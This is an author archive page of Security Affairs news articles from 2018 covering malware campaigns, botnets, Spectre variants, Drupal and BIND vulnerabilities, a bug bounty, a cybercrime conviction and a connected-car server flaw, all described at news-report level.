Author Archives: Pierluigi Paganini

North Korea-linked Sun Team APT group targets deflectors with Android Malware

A North Korea-linked APT group tracked as Sun Team has targeted North Korean deflectors with a malicious app that was published in the official Google Play store.

A North Korea-linked APT group tracked as Sun Team has targeted North Korean deflectors with a malicious app that was published in the official Google Play store.

The campaign, named RedDawn by security experts at McAfee, is the second campaign attributed conducted by the same APT group this year.

Experts noticed that this is the first time the APT abused the legitimate Google Play Store as the distribution channel. In a past campaign spotted in January, a group of North Korean deflectors and journalists was targeted via social networks, email, and chat apps.

Researchers at McAfee discovered that the malware was on Google Play as ‘unreleased’ versions and it accounts for only around 100 infections, they also notified it to Google that has already removed the threat from the store.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

“Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.” reads the post published by the security firm.

“We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack.”

The experts discovered three apps in the app store, the first one named 음식궁합 (Food Ingredients Info), provides information about food, the remaining apps, Fast AppLock and AppLockFree, are security applications.

While the 음식궁합 and Fast AppLock apps are data stealer malware that receives commands and additional executable (.dex) files from a cloud control server, the  AppLockFree is a reconnaissance malware that prepares the installations to further payloads.

The malware spread to friends, asking them to install the malicious apps and offer feedback via a Facebook account with a fake profile promoted 음식궁합.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks.” continues the report.  “From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,”

The logs collected by the malicious apps appear similar to other logs associated with the Sun Team APT group, in an apparently poor opsec the attackers used email addresses for malware’ developers associated with the North Korea group.

Sun Team malware-campaign

Of course, we cannot exclude that this is an intentional false flag to make hard the attribution of the attack.

The malware used in this campaign has been active at least since 2017, researchers observed numerous versions of the same code.

Threat actors are not native South Korean, but familiar with the culture and language.

“In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV.” continues the analysis published by McAfee,

“These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.”

The attackers tested their malware in with mobile devices from several while the exploit code found in a cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits.”

Some of the exploits were modified by the attackers, but experts believe that developers are currently not skillful enough to develop their own zero-day exploits,

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.

Pierluigi Paganini

(Security Affairs – Sun Team APT, malware)

The post North Korea-linked Sun Team APT group targets deflectors with Android Malware appeared first on Security Affairs.

Tech giants are all working on new Spectre and Meltdown attacks, so-called variant 3 and variant 4

Yesterday AMD, ARM, IBM, Intel, Microsoft and other major tech firms released updates, mitigations and published security advisories for two new variants of Meltdown and Spectre attacks.

Spectre and Meltdown made the headlines again, a few days after the disclosure of a new attack technique that allowed a group of researchers to recover data from the  System Management Mode (SMM) memory, IT giants release security updates and mitigations for two new variants of the speculative execution attack methods.

Let’s make a recap of the of the two flaws:

The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Meltdown attacks trigger the CVE-2017-5754 vulnerability, while Spectre attacks the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, only Meltdown and Spectre Variant 1 can be addressed via software, while Spectre Variant 2 required an update of the microcode for the affected processors. Software mitigations include.

In February white hat hackers at Google Project Zero and Microsoft discovered a new attack dubbed Variant 4 (CVE-2018-3639).

In May, a German website revealed that Intel along other vendors had been working on security updates for a new set of 8 of Spectre vulnerabilities, so-called “Spectre-NG.”

The new eight Spectre-NG vulnerabilities in Intel CPUs also affect some ARM processors, at the time of writing the researchers only disclosed to the German computer magazine Heise the partial details of the vulnerabilities, while experts speculated that they were very dangerous because easier to exploit.

Yesterday AMD, ARM, IBM, Intel, Microsoft and other major tech firms released updates, mitigations and published security advisories for two new variants of Meltdown and Spectre attacks. Both CERT/CC and US-CERT also published security advisories to warn of the new side-channel attacks.

Intel has already developed microcode that addresses both Variant 3a and Variant 4 and also distributed Beta versions to OEMs and operating system vendors. The tech giant plans to provide BIOS and software updates to its customers next weeks.

“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.” reads the advisory published by Intel. “This mitigation will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option.  In this configuration, we have observed no performance impact. If enabled, we’ve observed a performance impact of approximately 2 to 8 percent based on overall scores for benchmarks like SYSmark® 2014 SE and SPEC integer rate on client1 and server2 test systems.”

The bad news is that the security updates can cause a degradation of the performance.

AMD declared that Variant 3a does not affect its chips, while patches for Variant 4 should be expected from Microsoft and Linux distributions.

Microsoft is still assessing its products, but it declared that they are not affected by Variant 4.

“However, Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.” states the security advisory published by Microsoft.

“At the time of publication, we are not aware of any exploitable code patterns of this vulnerability class in our software or cloud service infrastructure, but we are continuing to investigate. Microsoft will implement the following strategy to mitigate Speculative Store Bypass.”

As for Variant 3a, says explained that the only way to mitigate the issue it through a microcode/firmware update and not an operating system update.

IBM has released both security patches for both firmware and OS to address the Variant 4 in the Power Systems series.

“In May 2018, a fourth variant was identified, CVE-2018-3639. This variant is another instantiation of a side-channel information disclosure attack.” reads the advisory published by IBM.

“Mitigation of these vulnerabilities for Power Systems clients involves installing patches to both system firmware and operating systems. Both the firmware and OS patches are required for the mitigation to be effective against these vulnerabilities and the latest firmware and OS patches incorporate mitigations for the fourth variant.”

Other tech giants published security advisories for the new variants of Spectre and Meltdown attacks, including CiscoOracle, Red HatSuseUbuntu, and VMware.

Pierluigi Paganini

(Security Affairs – Intel, Spectre and Meltdown)

The post Tech giants are all working on new Spectre and Meltdown attacks, so-called variant 3 and variant 4 appeared first on Security Affairs.

TheMoon botnet is now leveraging a zero-day to target GPON routers

Security experts from Qihoo 360 Netlab discovered the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.

Researchers from security firm Qihoo 360 Netlab reported that cybercriminals are continuing to target the Dasan GPON routers, they recently spotted threat actors using another new zero-day flaw affecting the same routers and recruit them in their botnet.

At the time of writing, there aren’t further details on the vulnerabilities exploited by attackers in the wild, Qihoo 360 Netlab experts only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

Experts discovered the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

GPON routers

TheMoon isn’t only the last botnet targeting Dasan GPON routers, in a previous analysis shared by Netlab, the experts confirmed that Hajime, Mettle, Mirai, Muhstik, and Satori botnets have been exploiting the CVE-2018-10561 and CVE-2018-10562 exploits for the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Despite a large number of GPON routers is exposed online only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to properly infect the devices.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day vulnerability will be exploited by other threat actors.

Pierluigi Paganini

(Security Affairs – GPON routers, botnet)

The post TheMoon botnet is now leveraging a zero-day to target GPON routers appeared first on Security Affairs.

Roaming Mantis gang evolves and broadens its operations

Roaming Mantis malware initially targeting Android devices, now has broadened both its geographic range and its targets.

Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The dreaded DNS hijacking malware was originally designed to steal users’ login credentials and the secret code for two-factor authentication from Android devices, it has evolved and recently was spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added the support for 27 languages to broaden their operations.

The versions of the Roaming Mantis malware continue to be spread via DNS hijacking, attackers used rogue websites to serve fake apps infected with banking malware to Android users, phishing sites to iOS users, and redirect users to websites hosting cryptocurrency mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018.It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.

“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new one “ping” and sendSms, setWifi, gcont, lock, onRecordAction, call, get_apps,

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in the attempt of stealing user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

Roaming Mantis

The Roaming Mantis operators have recently started targeting PC platforms, users are redirected to websites running the Coinhive web miner scripts.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign lead the researchers into believing that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs are available in the report published by Kaspersky.

Pierluigi Paganini

(Security Affairs – Roaming Mantis, cybercrime)

The post Roaming Mantis gang evolves and broadens its operations appeared first on Security Affairs.

Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.

The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment, then he discovered that it was possible to use some of Google’s internal APIs.

Pereira ethically reported the issue through the Google’s Vulnerability Reward Program (VRP). The experts at Google ranked the flaw as a P1 priority, a level that is assigned to vulnerabilities that could have a significant impact on a large number of users and that for this reason must be addressed as soon as possible.

Meantime Pereira continued his test and submitted a second report to Google after discovering further issues, then Google invited Pereira to stop his activities due to the risk to “easily break something using these internal APIs.”

Google security team discovered that the flaw reported by the youngster could led to remote code execution.

Google App Engine

Pereira published a detailed analysis of its finding after Google has fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how was it able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

Below the timeline for the flaw:

  • February 2018: Issue found
  • February 25th, 2018: Initial report (Only the “stubby” API)
  • March 4th and 5th, 2018: The “app_config_service” API discovered and reported
  • March between 6th and 13th, 2018: The access to non-prod GAE environments was blocked with a 429 error page
  • March 13th, 2018: Reward of $36,337 issued
  • May 16th, 2018: Issue confirmed as fixed

Pierluigi Paganini

(Security Affairs – Google App Engine, remote code execution flaw)

The post Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine appeared first on Security Affairs.

Hacked Drupal sites involved in mining campaigns, RATs distributions, scams

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Security experts at Malwarebytes reported that compromised Drupal websites are used to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

The two remote code execution security vulnerabilities, tracked as CVE-2018-7600 and CVE-2018-7602 have been already fixed by Drupal developers.

At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

The development team released the security update in time to address CVE-2018-7600.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

A week after the release of the security update, the experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report. the expert Vitalii Rudnykh shared a working  Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Other security firms observed threat actors have started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

At the end of April, the Drupal team fixed a new highly critical remote code execution issue (dubbed Drupalgeddon 3) tracked as CVE-2018-7602 with the release of versions 7.59, 8.4.8 and 8.5.3.

Also in this case, cybercriminals started exploiting the CVE-2018-7602 to hijack servers and install cryptocurrency miners.

The experts from Malwarebytes conducted an analysis of attacks involving Drupalgeddon2 and Drupalgeddon3 and discovered that most of the compromised Drupal sites had been running version 7.5.x, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

“Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.” reads the analysis published by Malwarebytes.

Drupal hacked websites

More than 80 percent of the compromised websites had been web cryptocurrency miners, Coinhive injections remain by far the most popular choice, followed by public or private Monero pools.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” continues the report.

Roughly 12 percent of the attacks delivered RATs or password stealers disguised as web browser updates, while Tech support scams accounted for nearly 7 percent of the client-side attacks.

Pierluigi Paganini

(Security Affairs – Drupalgeddon, hacking)

The post Hacked Drupal sites involved in mining campaigns, RATs distributions, scams appeared first on Security Affairs.

Security Affairs: Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.

Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition, the first issue tracked as CVE-2018-5737 can also cause severe operational problems such as degradation of the service.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off.  Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.” 

The flaw affects BIND 9.12.0 and 9.12.1 which permit recursion to clients and which have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below the workaround provided by the organization:

  • Setting “max-stalettl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
  • Setting “stale-answer enable off;” is not sufficient to prevent exploitation, max-stale-ttl needs to be set to zero.

BIND DNS sw flaw

The second flaw tracked as CVE-2018-5736 is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1, the ISC addressed it with the release of the version 9.12.1-P1. Experts noticed that admins need to update to version 9.12.1-P2 because version 9.12.1-P1 was affected by a problem.

This is the third time that the ISC provides security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could cause DNS servers crash,

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.

Pierluigi Paganini

(Security Affairs – BIND DNS software, DoS)

The post Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software appeared first on Security Affairs.



Security Affairs

Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.

Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition, the first issue tracked as CVE-2018-5737 can also cause severe operational problems such as degradation of the service.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off.  Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.” 

The flaw affects BIND 9.12.0 and 9.12.1 which permit recursion to clients and which have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below the workaround provided by the organization:

  • Setting “max-stalettl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
  • Setting “stale-answer enable off;” is not sufficient to prevent exploitation, max-stale-ttl needs to be set to zero.

BIND DNS sw flaw

The second flaw tracked as CVE-2018-5736 is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1, the ISC addressed it with the release of the version 9.12.1-P1. Experts noticed that admins need to update to version 9.12.1-P2 because version 9.12.1-P1 was affected by a problem.

This is the third time that the ISC provides security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could cause DNS servers crash,

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.

Pierluigi Paganini

(Security Affairs – BIND DNS software, DoS)

The post Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software appeared first on Security Affairs.

Judges convict crook of operating Scan4You Counter Antivirus Service

Crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors to test the evasion capabilities of their codes.

Scan4You is a familiar service for malware developers that used it as a counter anti-virus (CAV).

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.

scan4you

Scan4You was probably the largest counter anti-virus website, it went offline in May 2017 after authorities arrested two men in Latvia, the Russian national Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service that test their evasion capabilities against a broad range of anti-virus products.

The service is similar to the legitimate VirusTotal with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even if Scan4You was taken offline, crooks have other ways to test their malware before spreading them in the wild. Law enforcement must remain vigilant to prevent the growth of other similar services.

Pierluigi Paganini

(Security Affairs – CAV, Scan4You)

The post Judges convict crook of operating Scan4You Counter Antivirus Service appeared first on Security Affairs.

Security Affairs newsletter Round 163 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A new flaw in Electron poses a risk to apps based on the framework
·      Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
·      UK mobile operator EE left a critical code system exposed with a default password
·      Chilis restaurant chain is the last victim of a Payment Card Breach
·      Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
·      Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
·      PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
·      Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown
·      Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader
·      Dutch Government plans to phase out the use of Kaspersky solutions
·      Hackers shared technical details of a Code Injection flaw in Signal App
·      Massive DDoS attack hit the Danish state rail operator DSB
·      Rail Europe North America hit by payment card data breach
·      Anonymous defaced Russia govt website against Telegram ban
·      Mysterious hackers ingenuously reveal two Zero-Days to security community
·      Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
·      Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
·      Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
·      Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
·      Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files
·      A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
·      CISCO issued security updates to address three critical flaws in Cisco DNA Center
·      Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
·      The new Wicked Mirai botnet leverages at least three new exploits
·      A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market
·      Chrome evolves security indicators by marking with a red warning for HTTP content
·      More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit
·      Updated – The new Wicked Mirai botnet leverages at least three new exploits

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 163 – News of the week appeared first on Security Affairs.

Misconfigured CalAmp server allowed hacker to take over a lot of vehicles

Security researchers discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and takeover the associated vehicle.

CalAmp is a company that provides backend services for several well-known systems.

Security researchers Vangelis Stykas and George Lavdanis discovered that a  misconfigured server operated by the CalAmp company could allow anyone to access account data and takeover the associated vehicle.

The experts were searching for security vulnerabilities in the Viper SmartStart system, a device that allows users to remotely start, lock, unlock, or locate their vehicles directly using a mobile app on their smartphones.

As with many other mobile applications, it used secure connections with SSL and Certificate Pinning (Hard-code in the client the certificate is known to be used by the server) to automatically reject a connection from sites that offer bogus SSL certificates.

The experts noticed that the app was connecting to mysmartstart.com domain and also to the third party domain (https://colt.calamp-ts.com/), it is the Calamp.com Lender Outlook service.

The experts discovered that using the credentials for the user created from the viper app it was possible to login the panel.

“This panel seemed to be the frontend for Calamp.com Lender Outlook service. We tried our user created from the viper app, to login and it worked!” reads the blog post published by Stykas.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them.” 

CalAmp car hacking.png

Further tests allowed the researchers to verify that the portal was secured, but during the assessment, the experts discovered that the reports were delivered by another dedicated server running tibco jasperreports software.

This was the first time the experts analyzed this type of server, they had to improvise and after removing all parameters they discovered they were logged in as a user with limited rights but with access to a lot of reports.

“None of us were familiar with that so we had to improvise. Removing all the parameters we found out that we were already logged in with a limited user that had access to A LOT of reports.” continues the report.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input.And…well..we could provide any number we wanted.”

The researchers gained access to all the reports for all the vehicles (including location history), and also data sources with usernames (the passwords were masked and there was no possibility to export them).

The server also allowed for the copying and editing any existing reports.

“We could not create a report or an adhoc or pretty much anything else, but we could copy paste existing ones and edit them so we can do pretty much anything.We could also edit the report and add arbitrary XSS to steal information but this was not something that we (or anyone in their right lawful mind) would want to do.” continues the report.

The availability of all production databases on the server, including CalAmp connect device outlook, was exploited by the researchers to take over a user account via the mobile application. If the attacker knows the older password for the account can simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

According to the experts the exploitation of the flaw could allow:

  • Well the very obvious just change the user password to a known one go to the car, unlock, start and leave.
  • Get all the reports of where everyone was
  • Stop the engine while someone was driving ?
  • Start the engine when you shouldn’t.
  • Get all the users and leak.
  • As we haven’t actually seen the hardware we might be able to pass can bus messages though the app ?
  • Get all the IoT devices from connect database or reset a password there and start poking around.
  • Really the possibilities are endless…

The experts reported the issue to CalAmp at the beginning of May 2018, and the company addressed the flaw in ten days.

Pierluigi Paganini

(Security Affairs – CalAmp, car hacking)

The post Misconfigured CalAmp server allowed hacker to take over a lot of vehicles appeared first on Security Affairs.

Experts propose a new variation of the Spectre attack to recover data from System Management Mode

Researchers from Eclypsium proposed a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode.

Security experts from Eclypsium have devised a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode (SMM) (aka called ring -2).

The SMM is an operating mode of x86 CPUs in which all normal execution, including the operating system, is suspended.

When a code is sent to the SMM, the operating system is suspended and a portion of the UEFI/BIOS firmware executes various commands with elevated privileges and with access to all the data and hardware.

“The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.” reads Wikipedia.

The SMM mode was first released with the Intel 386SL in the early 90s, Intel CPUs implements a memory protection mechanism known as a range register to protect sensitive contents of memory regions such as SMM memory.

SMM memory on Intel CPUs is protected by a special type of range registers known as System Management Range Register (SMRR).

Eclypsium experts based their study on a public proof-of-concept code for the Spectre variant 1 (CVE-2017-5753) vulnerability to bypass the SMRR mechanism and access to the content of the System Management RAM (SMRAM) that contains the SMM and where the SMM working data is executed.

“Because SMM generally has privileged access to physical memory, including memory isolated from operating systems, our research demonstrates that Spectre-based attacks can reveal other secrets in memory (eg. hypervisor, operating system, or application).” states the report published by Eclypsium.

“These enhanced Spectre attacks allow an unprivileged attacker to read the contents of memory, including memory that should be protected by the range registers, such as SMM memory. This can expose SMM code and data that was intended to be confidential, revealing other SMM vulnerabilities as well as secrets stored in SMM,” 

Spectre vulnerabilities

The experts ported the PoC code to a kernel driver and demonstrated it works from the kernel privilege level. Then they run they exploit code from the kernel privilege level against protected memory.

“The kernel-level PoC exploit provides access to different hardware interfaces, which gives attackers better control over the system hardware and access to different hardware interfaces such as physical memory, IO, PCI, and MMIO interfaces. It also provides access to interfaces at a higher privilege level, such as software SMI.” explained the researchers.

“Next, we integrated the PoC exploit into CHIPSEC in order to quickly expand our tests. In our first experiment, we tried to read protected SMRAM memory. We mapped the physical addresses of SMRAM into the virtual address space and then used the SMRAM addresses as the target of our exploit.” 

The experts believe that it is possible to obtain the same result by using Spectre variant 2 (CVE-2017-5715) can also achieve the same results.

